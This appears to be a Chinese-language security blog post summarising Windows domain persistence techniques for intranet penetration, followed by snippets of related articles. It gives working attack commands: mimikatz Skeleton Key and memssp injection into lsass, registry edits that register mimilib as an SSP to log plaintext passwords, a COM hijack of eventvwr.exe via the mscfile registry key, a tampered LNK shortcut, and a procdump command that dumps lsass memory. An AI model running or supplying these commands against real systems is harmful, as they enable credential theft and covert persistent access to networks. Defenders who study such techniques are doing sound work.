内网渗透|域内持久权限维持总结

VSole2021-08-08 07:20:00

0x01 万能密码(Skeleton Key)

将自身注入lsass进程创建一个主密码,可以适用于域内的任意账户。

前提条件是拥有域管权限。

mimikatz执行:

privilege::debug
misc::skeleton

然后ipc连接域控

0x02 SSP

SSPI 将负责为想要通信的两台机器找到合适的协议。对此的首选方法是 Kerberos。然后 SSPI 将协商将使用哪种身份验证协议,这些身份验证协议称为安全支持提供程序 (SSP),以 DLL 的形式位于每台 Windows 机器内部,并且两台机器必须支持相同才能进行通信。

我们可以自己创建ssp,捕获明文。

2.1 注册SSP DLL

1.将mimilib.dll复制到system32目录下

move mimilib.dll %systemroot%\system32

2.查看Security Packages

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

3.修改Security Packages值

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

密码会保存在:

C:\Windows\System32\kiwissp.log

会产生事件ID为4657的日志。

2.2 内存加载

privilege::debug
misc::memssp

当用户登录的时候密码会储存在

C:\Windows\system32\mimilsa.log

0x03 com劫持

Microsoft 组件对象模型 (COM) 是一个独立于平台、分布式、面向对象的系统,用于创建可以交互的二进制软件组件。

我们可以更改事件管理器,使其打开启动我们的二进制文件。

修改

HKCU\SOFTWARE\Classes\mscfile\shell\open\command

将原来的

%SystemRoot%\system32\mmc.exe "%1" %*

修改为:

C:\windows\system32\cmd.exe

执行:

reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "c:\windows\system32\cmd.exe /c \"start cmd\"" /f
eventvwr.exe

0x04 lnk

这里以该快捷文件为例:

修改目标为:

powershell.exe -c "invoke-item C:\Users\Administrator\Desktop\AdExplorer\ADExplorer64.exe; invoke-item c:\windows\system32\calc.exe"

再把图标修改回来:

运行lnk

本作品采用《CC 协议》,转载必须注明作者和本文链接
持久权限维持总结
很多人把这个原因归结于KB2871997补丁,实际上不然,这个事情的成因实际是UAC在捣乱。RID为500的账户和属于本地administrators组的用户在通过网络远程链接时,默认就是高权限令牌。
信息搜集:开源情报信息收集、创建企业密码字典进入:基于企业弱账号漏洞、基于系统漏洞进入、网站应用程序渗透隐匿攻击:Command and Control、代理跨边界应用:跨边界转发、跨边界代理穿透、shell反弹等
如果找到了某个用户的ntlm hash,就可以拿这个ntlm hash当作凭证进行远程登陆了 其中若hash加密方式是 rc4 ,那么就是pass the hash 若加密方式是aes key,那么就是pass the key 注意NTLM和kerberos协议均存在PTH: NTLM自然不用多说 kerberos协议也是基于用户的client hash开始一步步认证的,自然也会受PTH
# 此时攻击机已经获取到了bash$ python -c 'import pty; pty.spawn'$ ctrl + z //快捷键。$ fg$ reset //这一步我实测有问题,输了会出问题,不输也没有影响,所以如果输了有问题可以不输。低权限提权首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Databas
所以可以通过它传回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 执行该指令,获取到lsass.dmp
所以可以通过它传回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 执行该指令,获取到lsass.dmp
VSole
网络安全专家